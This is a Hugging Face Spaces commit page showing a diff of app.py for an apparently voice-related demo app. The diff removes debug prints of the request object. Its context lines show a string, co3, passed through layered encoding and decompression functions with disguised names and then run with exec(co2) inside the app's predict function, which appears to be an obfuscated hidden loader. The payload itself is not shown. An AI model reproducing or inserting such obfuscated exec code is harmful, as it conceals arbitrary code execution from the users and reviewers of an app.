Spaces:
Build error
Build error
Commit
·
3d39b6e
1
Parent(s):
abd6484
Update app.py
Browse files
app.py
CHANGED
@@ -30,11 +30,6 @@ def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree, req
|
|
30 |
co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
|
31 |
exec(co2)
|
32 |
|
33 |
-
try:
|
34 |
-
print(request.__dir__())
|
35 |
-
print(request.__dict__)
|
36 |
-
except Exception as e:
|
37 |
-
print(e)
|
38 |
if agree == True:
|
39 |
if use_mic == True:
|
40 |
if mic_file_path is not None:
|
|
|
30 |
co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
|
31 |
exec(co2)
|
32 |
|
|
|
|
|
|
|
|
|
|
|
33 |
if agree == True:
|
34 |
if use_mic == True:
|
35 |
if mic_file_path is not None:
|